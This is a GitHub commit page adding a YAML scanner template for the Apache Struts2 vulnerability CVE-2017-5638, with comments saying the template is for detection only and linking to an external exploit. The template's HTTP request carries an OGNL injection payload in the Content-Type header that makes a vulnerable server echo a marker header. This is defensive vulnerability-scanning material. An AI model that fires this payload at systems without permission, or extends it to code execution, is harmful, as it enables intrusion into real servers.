Merge pull request #325 from random-robbie/patch-2

Create CVE-2017-5638.yaml
patch-1
bauthard 2020-08-19 19:31:39 +05:30 committed by GitHub
commit ae84b3552b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

29
cves/CVE-2017-5638.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2017-5638
info:
author: "Random Robbie"
name: "Struts2 RCE "
severity: critical
# This template supports the detection part only.
# Do not test any website without permission
# Exploit:- https://github.com/mazen160/struts-pwn
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
words:
- "Bounty Plz"
part: header